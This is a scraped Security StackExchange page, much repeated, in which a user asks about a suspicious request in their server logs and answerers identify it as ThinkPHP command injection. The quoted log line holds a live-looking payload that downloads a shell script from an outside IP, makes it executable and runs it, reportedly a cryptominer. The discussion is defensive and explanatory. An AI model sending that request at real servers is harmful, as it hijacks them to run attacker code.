Ggthjy

What is the wife of a henpecked husband called?

Program that converts a number to a letter of the alphabet

How does Arcane Armament interact with the Artillerist Artificer's Wand Prototype feature?

How to avoid being sexist when trying to employ someone to function in a very sexist environment?

What is a jet (unit) shown in Windows 10 calculator?

Would these multi-classing house rules cause unintended problems?

What is this metal M-shaped device for?

If I delete my router's history can my ISP still provide it to my parents?

Difference between thick vs thin front suspension?

Isn't using the Extrusion Multiplier like cheating?

How to explain planetary rings pulsating?

Can a hotel cancel a confirmed reservation?

Broken patches on a road

Difference between two quite-similar Terminal commands

Is it a fallacy if someone claims they need an explanation for every word of your argument to the point where they don't understand common terms?

Compress command output by piping to bzip2

figures in a grid with multiple line of texts

Process to change collation on a database

Help Me simplify: C*(A+B) + ~A*B

Slow moving projectiles from a hand-held weapon - how do they reach the target?

A minimum of two personnel "are" or "is"?

Magento 2 : Call Helper Without Using __construct in Own Module

Is a debit card dangerous for an account with low balance and no overdraft protection?

Using only 1s, make 29 with the minimum number of digits

How to prevent users from executing commands through browser URL

Executing arbitrary commands through iptables-restore inputHow to prevent browser from rendering malacious content if request or response is hacked?how to detect the URL an android app usesHow to prevent future attacks from Trojan.Agent.Linux.A?How to prevent hotlinking on binary content served through PHP?What, if any, URL protocols should I whitelist or blacklist when spawning the user's browser?How do URL shortening services like bitly prevent ddos attacks?set newline or slash through URLUUID in URL - how safe from accidental discovery is my proposed solution?How to prevent unauthorized users from accessing an image on my server just by URL?

37

10

I have very little experience with security (Still learning) however was combing through my logs and I noticed the following request:

"GET /index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=wget%20http://86.105.49.215/a.sh%20-O%20/tmp/a;%20chmod%200777%20/tmp/a;%20/tmp/a; HTTP/1.1" 200 16684 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36"

Now first of all this made no sense to me with the exception of chmod 777 which tells me someone was trying to change my file permissions.

My question is what kind of attack is this and what steps can I take to prevent it?

linux http url

share|improve this question

edited 4 hours ago

unor

1,05511332

asked yesterday

user3718908user3718908

29125

New contributor

user3718908 is a new contributor to this site. Take care in asking for clarification, commenting, and answering.
Check out our Code of Conduct.

• 
  
  
  

  
  30
  

  
  
  
  
  
  

  
  
  Specifically, the attacker is targetting ThinkPHP installations that suffer from the remote-code-execution vulnerability documented here. A security update has been released by ThinkPHP. Keep an eye on the inventory of software that you have exposed to the internet, and keep an eye out for vulerabilities found in these packages. In short, stay up to date. The attackers are usually exploiting old versions found to be vulerable.
  
  – spender
  yesterday
  
  
  

  
  
  
  


• 
  
  
  

  
  

  
  
  
  
  
  

  
  
  Are you 1) a developer or 2) a systems engineer / webmaster? Do you develop or run applications?
  
  – usr-local-ΕΨΗΕΛΩΝ
  yesterday
  

  
  
  
  


• 
  
  
  

  
  3
  

  
  
  
  
  
  

  
  
  Applications are immune to these attacks by default - you have to actively screw up in order for the attack to work.
  
  – immibis
  yesterday
  

  
  
  
  


• 
  
  
  

  
  1
  

  
  
  
  
  
  

  
  
  So if you're asking how to avoid this attack - unless you're running ThinkPHP, you're already not vulnerable. If you're asking how to avoid similar attacks on your own software - see the information linked by Soufiane.
  
  – immibis
  yesterday
  

  
  
  
  


• 
  
  
  

  
  1
  

  
  
  
  
  
  

  
  
  @immibis It may be worth noting that "actively screwing up" is fairly common with PHP software, at least historically. PHP has a history of making it hard to do the right thing and easy to do the wrong thing security wise (not just in command injection attacks). In my opinion, this is a good reason to avoid PHP if security is a priority (both writing in it and using software written in it), which it should be.
  
  – jpmc26
  9 hours ago
  
  
  

  
  
  
  

 | 
show 4 more comments

37

10

I have very little experience with security (Still learning) however was combing through my logs and I noticed the following request:

"GET /index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=wget%20http://86.105.49.215/a.sh%20-O%20/tmp/a;%20chmod%200777%20/tmp/a;%20/tmp/a; HTTP/1.1" 200 16684 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36"

Now first of all this made no sense to me with the exception of chmod 777 which tells me someone was trying to change my file permissions.

My question is what kind of attack is this and what steps can I take to prevent it?

linux http url

share|improve this question

edited 4 hours ago

unor

1,05511332

asked yesterday

user3718908user3718908

29125

New contributor

user3718908 is a new contributor to this site. Take care in asking for clarification, commenting, and answering.
Check out our Code of Conduct.

• 
  
  
  

  
  30
  

  
  
  
  
  
  

  
  
  Specifically, the attacker is targetting ThinkPHP installations that suffer from the remote-code-execution vulnerability documented here. A security update has been released by ThinkPHP. Keep an eye on the inventory of software that you have exposed to the internet, and keep an eye out for vulerabilities found in these packages. In short, stay up to date. The attackers are usually exploiting old versions found to be vulerable.
  
  – spender
  yesterday
  
  
  

  
  
  
  


• 
  
  
  

  
  

  
  
  
  
  
  

  
  
  Are you 1) a developer or 2) a systems engineer / webmaster? Do you develop or run applications?
  
  – usr-local-ΕΨΗΕΛΩΝ
  yesterday
  

  
  
  
  


• 
  
  
  

  
  3
  

  
  
  
  
  
  

  
  
  Applications are immune to these attacks by default - you have to actively screw up in order for the attack to work.
  
  – immibis
  yesterday
  

  
  
  
  


• 
  
  
  

  
  1
  

  
  
  
  
  
  

  
  
  So if you're asking how to avoid this attack - unless you're running ThinkPHP, you're already not vulnerable. If you're asking how to avoid similar attacks on your own software - see the information linked by Soufiane.
  
  – immibis
  yesterday
  

  
  
  
  


• 
  
  
  

  
  1
  

  
  
  
  
  
  

  
  
  @immibis It may be worth noting that "actively screwing up" is fairly common with PHP software, at least historically. PHP has a history of making it hard to do the right thing and easy to do the wrong thing security wise (not just in command injection attacks). In my opinion, this is a good reason to avoid PHP if security is a priority (both writing in it and using software written in it), which it should be.
  
  – jpmc26
  9 hours ago
  
  
  

  
  
  
  

 | 
show 4 more comments

I have very little experience with security (Still learning) however was combing through my logs and I noticed the following request:

"GET /index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=wget%20http://86.105.49.215/a.sh%20-O%20/tmp/a;%20chmod%200777%20/tmp/a;%20/tmp/a; HTTP/1.1" 200 16684 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36"

Now first of all this made no sense to me with the exception of chmod 777 which tells me someone was trying to change my file permissions.

My question is what kind of attack is this and what steps can I take to prevent it?

linux http url

share|improve this question

edited 4 hours ago

unor

1,05511332

asked yesterday

user3718908user3718908

29125

New contributor

user3718908 is a new contributor to this site. Take care in asking for clarification, commenting, and answering.
Check out our Code of Conduct.

"GET /index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=wget%20http://86.105.49.215/a.sh%20-O%20/tmp/a;%20chmod%200777%20/tmp/a;%20/tmp/a; HTTP/1.1" 200 16684 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36"

share|improve this question

edited 4 hours ago

unor

1,05511332

asked yesterday

user3718908user3718908

29125

New contributor

user3718908 is a new contributor to this site. Take care in asking for clarification, commenting, and answering.
Check out our Code of Conduct.

share|improve this question

edited 4 hours ago

unor

1,05511332

asked yesterday

user3718908user3718908

29125

New contributor

user3718908 is a new contributor to this site. Take care in asking for clarification, commenting, and answering.
Check out our Code of Conduct.

edited 4 hours ago

unor

1,05511332

edited 4 hours ago

unor

1,05511332

asked yesterday

user3718908user3718908

29125

New contributor

user3718908 is a new contributor to this site. Take care in asking for clarification, commenting, and answering.
Check out our Code of Conduct.

asked yesterday

user3718908user3718908

29125

2 Answers
2

active

oldest

votes

52

It's a command injection attack in which :

the goal is execution of arbitrary commands on the host
operating system via a vulnerable application. Command injection
attacks are possible when an application passes unsafe user supplied
data (forms, cookies, HTTP headers etc.) to a system shell. In this
attack, the attacker-supplied operating system commands are usually
executed with the privileges of the vulnerable application. Command
injection attacks are possible largely due to insufficient input
validation.

There are many strategies to mitigate or to avoid this kind of attacks you can find somes here and have a look at this cheatsheet from OWASP.

share|improve this answer

answered yesterday

Soufiane TahiriSoufiane Tahiri

2,146721

• 
  
  
  

  
  

  
  
  
  
  
  

  
  
  The easiest and maybe most important step from the first link is using 'least privilege'. Reducing the power of the application will blunt these kinds of attacks and many others.
  
  – JimmyJames
  yesterday
  

  
  
  
  


• 
  
  
  

  
  

  
  
  
  
  
  

  
  
  Currently, for answers to OP's "how to" question you only link to 3rd party sites. This is not an answer of expected quality standard because links may stop working. Please copy substantial parts of the "how-to" directly to your answer.
  
  – miroxlav
  2 hours ago
  
  
  

  
  
  
  

add a comment | 

18

As stated before, it's a command injection attack that attempts to download a .sh script, grant it permissions to run and then execute it.
The script in this case is a bitcoin miner.

The recommendations in the OWASP guide that Soufiane should be followed to ensure your web application is secure, but for an extra layer of security a Web Application Firewall can be used which will block requests like these before they reach your server process.

share|improve this answer

answered yesterday

VeyfVeyf

1812

New contributor

Veyf is a new contributor to this site. Take care in asking for clarification, commenting, and answering.
Check out our Code of Conduct.

• 
  
  
  

  
  4
  

  
  
  
  
  
  

  
  
  If StackExchange had been using such a firewall it might not have been possible to ask the question in the first place.
  
  – kasperd
  6 hours ago
  

  
  
  
  

add a comment | 

Your Answer

StackExchange.ready(function() {
var channelOptions = {
tags: "".split(" "),
id: "162"
};
initTagRenderer("".split(" "), "".split(" "), channelOptions);

StackExchange.using("externalEditor", function() {
// Have to fire editor after snippets, if snippets enabled
if (StackExchange.settings.snippets.snippetsEnabled) {
StackExchange.using("snippets", function() {
createEditor();
});
}
else {
createEditor();
}
});

function createEditor() {
StackExchange.prepareEditor({
heartbeatType: 'answer',
autoActivateHeartbeat: false,
convertImagesToLinks: false,
noModals: true,
showLowRepImageUploadWarning: true,
reputationToPostImages: null,
bindNavPrevention: true,
postfix: "",
imageUploader: {
brandingHtml: "Powered by u003ca class="icon-imgur-white" href="https://imgur.com/"u003eu003c/au003e",
contentPolicyHtml: "User contributions licensed under u003ca href="https://creativecommons.org/licenses/by-sa/3.0/"u003ecc by-sa 3.0 with attribution requiredu003c/au003e u003ca href="https://stackoverflow.com/legal/content-policy"u003e(content policy)u003c/au003e",
allowUrls: true
},
noCode: true, onDemand: true,
discardSelector: ".discard-answer"
,immediatelyShowMarkdownHelp:true
});


}
});

user3718908 is a new contributor. Be nice, and check out our Code of Conduct.

draft saved

draft discarded

Sign up or log in

StackExchange.ready(function () {
StackExchange.helpers.onClickDraftSave('#login-link');
});

Sign up using Google

Sign up using Facebook

Sign up using Email and Password

Post as a guest

Name

Email

Required, but never shown

StackExchange.ready(
function () {
StackExchange.openid.initPostLogin('.new-post-login', 'https%3a%2f%2fsecurity.stackexchange.com%2fquestions%2f204459%2fhow-to-prevent-users-from-executing-commands-through-browser-url%23new-answer', 'question_page');
}
);

Post as a guest

Name

Email

Required, but never shown

52

It's a command injection attack in which :

the goal is execution of arbitrary commands on the host
operating system via a vulnerable application. Command injection
attacks are possible when an application passes unsafe user supplied
data (forms, cookies, HTTP headers etc.) to a system shell. In this
attack, the attacker-supplied operating system commands are usually
executed with the privileges of the vulnerable application. Command
injection attacks are possible largely due to insufficient input
validation.

There are many strategies to mitigate or to avoid this kind of attacks you can find somes here and have a look at this cheatsheet from OWASP.

share|improve this answer

answered yesterday

Soufiane TahiriSoufiane Tahiri

2,146721

• 
  
  
  

  
  

  
  
  
  
  
  

  
  
  The easiest and maybe most important step from the first link is using 'least privilege'. Reducing the power of the application will blunt these kinds of attacks and many others.
  
  – JimmyJames
  yesterday
  

  
  
  
  


• 
  
  
  

  
  

  
  
  
  
  
  

  
  
  Currently, for answers to OP's "how to" question you only link to 3rd party sites. This is not an answer of expected quality standard because links may stop working. Please copy substantial parts of the "how-to" directly to your answer.
  
  – miroxlav
  2 hours ago
  
  
  

  
  
  
  

add a comment | 

52

It's a command injection attack in which :

the goal is execution of arbitrary commands on the host
operating system via a vulnerable application. Command injection
attacks are possible when an application passes unsafe user supplied
data (forms, cookies, HTTP headers etc.) to a system shell. In this
attack, the attacker-supplied operating system commands are usually
executed with the privileges of the vulnerable application. Command
injection attacks are possible largely due to insufficient input
validation.

There are many strategies to mitigate or to avoid this kind of attacks you can find somes here and have a look at this cheatsheet from OWASP.

share|improve this answer

answered yesterday

Soufiane TahiriSoufiane Tahiri

2,146721

• 
  
  
  

  
  

  
  
  
  
  
  

  
  
  The easiest and maybe most important step from the first link is using 'least privilege'. Reducing the power of the application will blunt these kinds of attacks and many others.
  
  – JimmyJames
  yesterday
  

  
  
  
  


• 
  
  
  

  
  

  
  
  
  
  
  

  
  
  Currently, for answers to OP's "how to" question you only link to 3rd party sites. This is not an answer of expected quality standard because links may stop working. Please copy substantial parts of the "how-to" directly to your answer.
  
  – miroxlav
  2 hours ago
  
  
  

  
  
  
  

add a comment | 

It's a command injection attack in which :

the goal is execution of arbitrary commands on the host
operating system via a vulnerable application. Command injection
attacks are possible when an application passes unsafe user supplied
data (forms, cookies, HTTP headers etc.) to a system shell. In this
attack, the attacker-supplied operating system commands are usually
executed with the privileges of the vulnerable application. Command
injection attacks are possible largely due to insufficient input
validation.

There are many strategies to mitigate or to avoid this kind of attacks you can find somes here and have a look at this cheatsheet from OWASP.

share|improve this answer

answered yesterday

Soufiane TahiriSoufiane Tahiri

2,146721

share|improve this answer

answered yesterday

Soufiane TahiriSoufiane Tahiri

2,146721

answered yesterday

Soufiane TahiriSoufiane Tahiri

2,146721

answered yesterday

Soufiane TahiriSoufiane Tahiri

2,146721

18

As stated before, it's a command injection attack that attempts to download a .sh script, grant it permissions to run and then execute it.
The script in this case is a bitcoin miner.

The recommendations in the OWASP guide that Soufiane should be followed to ensure your web application is secure, but for an extra layer of security a Web Application Firewall can be used which will block requests like these before they reach your server process.

share|improve this answer

answered yesterday

VeyfVeyf

1812

New contributor

Veyf is a new contributor to this site. Take care in asking for clarification, commenting, and answering.
Check out our Code of Conduct.

• 
  
  
  

  
  4
  

  
  
  
  
  
  

  
  
  If StackExchange had been using such a firewall it might not have been possible to ask the question in the first place.
  
  – kasperd
  6 hours ago
  

  
  
  
  

add a comment | 

18

As stated before, it's a command injection attack that attempts to download a .sh script, grant it permissions to run and then execute it.
The script in this case is a bitcoin miner.

The recommendations in the OWASP guide that Soufiane should be followed to ensure your web application is secure, but for an extra layer of security a Web Application Firewall can be used which will block requests like these before they reach your server process.

share|improve this answer

answered yesterday

VeyfVeyf

1812

New contributor

Veyf is a new contributor to this site. Take care in asking for clarification, commenting, and answering.
Check out our Code of Conduct.

• 
  
  
  

  
  4
  

  
  
  
  
  
  

  
  
  If StackExchange had been using such a firewall it might not have been possible to ask the question in the first place.
  
  – kasperd
  6 hours ago
  

  
  
  
  

add a comment | 

As stated before, it's a command injection attack that attempts to download a .sh script, grant it permissions to run and then execute it.
The script in this case is a bitcoin miner.

The recommendations in the OWASP guide that Soufiane should be followed to ensure your web application is secure, but for an extra layer of security a Web Application Firewall can be used which will block requests like these before they reach your server process.

share|improve this answer

answered yesterday

VeyfVeyf

1812

New contributor

Veyf is a new contributor to this site. Take care in asking for clarification, commenting, and answering.
Check out our Code of Conduct.

share|improve this answer

answered yesterday

VeyfVeyf

1812

New contributor

Veyf is a new contributor to this site. Take care in asking for clarification, commenting, and answering.
Check out our Code of Conduct.

answered yesterday

VeyfVeyf

1812

New contributor

Veyf is a new contributor to this site. Take care in asking for clarification, commenting, and answering.
Check out our Code of Conduct.

answered yesterday

VeyfVeyf

1812